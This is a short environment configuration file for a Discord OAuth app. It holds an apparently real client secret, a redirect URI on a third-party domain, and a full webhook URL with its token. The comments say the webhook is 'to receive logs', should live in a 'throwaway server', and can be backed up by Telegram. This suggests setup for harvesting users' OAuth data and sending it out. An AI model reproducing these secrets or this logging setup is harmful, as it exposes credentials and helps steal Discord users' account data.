# Create app at https://discord.com/developers/applications
DISCORD_CLIENT_ID=1460687587848224779
DISCORD_CLIENT_SECRET=-a4fJv2kDvmrn3Ou6gAmIx4aidULL0ur

# Must match exactly what you put in OAuth2 → Redirects
REDIRECT_URI=https://discord.jo3.org/oauth/callback

# Your Discord webhook to receive logs (create one in a throwaway server)
WEBHOOK_URL=https://discord.com/api/webhooks/1460687112688107737/FcT17Vi21kFfxFcdRResznSPoiAuspSp_4EMrb6cez9-UVayFymSWS4Ahe87p_vQVJWi
# Optional: Telegram (more reliable)
TELEGRAM_BOT_TOKEN=1234567890:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
TELEGRAM_CHAT_ID=-1001234567890